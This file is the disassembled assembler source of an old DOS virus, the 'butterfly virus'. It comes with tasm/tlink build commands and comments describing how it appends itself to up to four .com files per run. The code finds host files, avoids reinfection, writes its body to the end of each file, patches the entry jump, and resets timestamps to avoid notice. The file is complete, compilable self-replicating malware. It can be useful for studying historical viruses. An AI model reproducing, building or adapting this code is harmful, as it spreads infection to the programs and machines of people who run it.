comment|

************************************************************************
virus name: butterfly virus
effective length: 302 bytes
disassembled by silent death - 1993

notes:
- non-resident .com appender
- infects up to 4 files in the current directory
- infected files have 01h as the 4th byte
- ok virus to learn off of but a lot of wasteful code

to compile: [byte matchup!]

tasm /m file.asm
tlink /t file.obj
************************************************************************|

.model tiny
.code
org 100h

start:
jmp virus
nop
nop

oldjmp db 0cdh ; int 20h

newjmp db 20h
db 90h ; nop
id db 1 ; infection marker

virus:
call delta ; get delta offset
delta:
pop bp
sub bp,10bh ; adjust delta offset

mov di,100h ; move bytes to the start

lea si,[bp+oldjmp] ; original starting
mov cx,4 ; move four bytes
cld ; clear direction flag
rep movsb ; move the bytes

mov ah,1ah ; set dta

lea dx,[bp+dta] ; set into heap
int 21h

mov byte ptr [bp+offset counter],0 ; reset counter

mov ah,4eh ; find first asciiz file

lea si,[bp+dta+1eh] ; points to fname in dta
lea dx,[bp+fspec] ; files to find (*.com)
push dx ; save file spec
jmp short findfiles

returntohost:
mov ah,1ah ; set dta
mov dx,80h ; to original position
 int 21h

xor ax,ax ; clear all registers

xor bx,bx ; no real need to
xor cx,cx
xor dx,dx
xor si,si
xor di,di
mov sp,0fffeh ; adjust stack pointer
mov bp,100h ; return to here
push bp
xor bp,bp ; clear this
retn ; return to host

closeup:
or bx,bx ; is handle 0?
jz findnext ; yup so don't bother closing

mov ch,0 ; get attributes

mov cl,[bp+dta+15h] ; theres no point!

mov ax,5701h ; set files date/time

mov cx,word ptr [bp+dta+16h]; get original time
mov dx,word ptr [bp+dta+18h]; get original date
int 21h

mov ah,3eh ; close file

int 21h
xor bx,bx ; delete handle

findnext:
mov ah,4fh ; find next file

findfiles:
pop dx ; get filespec
push dx
mov cx,7 ; all attributes
xor bx,bx ; make sure no handle
int 21h

jnc infect ; jump if file found

jmp returntohost2 ; no files found then quit

vname db 0ffh
db 'goddamn butterflies' ; ya know!
db 0ffh

infect:
mov dx,si ; dx => fname in dta

mov ax,3d02h ; open file read/write

int 21h
jc closeup ; if error close up, get another
mov bx,ax ; handle to bx

mov ah,3fh ; read from file

mov cx,4 ; four bytes
lea dx,[bp+oldjmp] ; save here
 int 21h

mov ax,word ptr [bp+dta+23h]; get end of filename

cmp ax,444eh ; is file command.com?
je closeup ; yup so leave it

cmp [bp+id],1 ; is file infected?

je closeup ; yup so leave it

mov ax,word ptr [bp+dta+1ah]; get file size

cmp ax,121 ; is file smaller than 121?
jb closeup ; if it is leave it

mov ax,4202h ; file pointer to end

cwd
xor cx,cx
int 21h

cmp ax,64768 ; is file to big to infect

ja closeup ; if above then jump

mov [bp+data],ax ; save file size

lea dx,[bp+oldjmp] ; buffer to write from

mov cx,4 ; 4 bytes
mov ah,40h ; write oldjmp to end of file
int 21h

lea dx,[bp+virus] ; start of virus

mov cx,12ah ; write virus (298) to end
mov ah,40h ; write to file
int 21h

mov ax,4200h ; file pointer to start

cwd
xor cx,cx
int 21h

mov ax,[bp+data] ; get the file size

inc ax ; increment the file size
mov word ptr [bp+newjmp],ax ; save the new jump
mov [bp+oldjmp],0e9h ; new jump
mov [bp+id],1 ; infection marker

lea dx,[bp+oldjmp] ; new jump

mov ah,40h ; write new start
mov cx,4 ; four bytes
int 21h

inc [bp+counter]
cmp [bp+counter],4 ; has 4 files been infected?
jae returntohost3 ; yup so return to host
jmp closeup ; close current file

returntohost2: ; this is a total waste!

mov di,100h ; start of file
cmp word ptr [di],20cdh ; are we the original
je returntohost3 ; yup
returntohost3:
jmp returntohost

fspec db '*.com',0 ; files to find

dta db 43 dup (0) ; holds dta

counter db 0 ; holds file counter
data dw 0 ; holds new jump offset

end start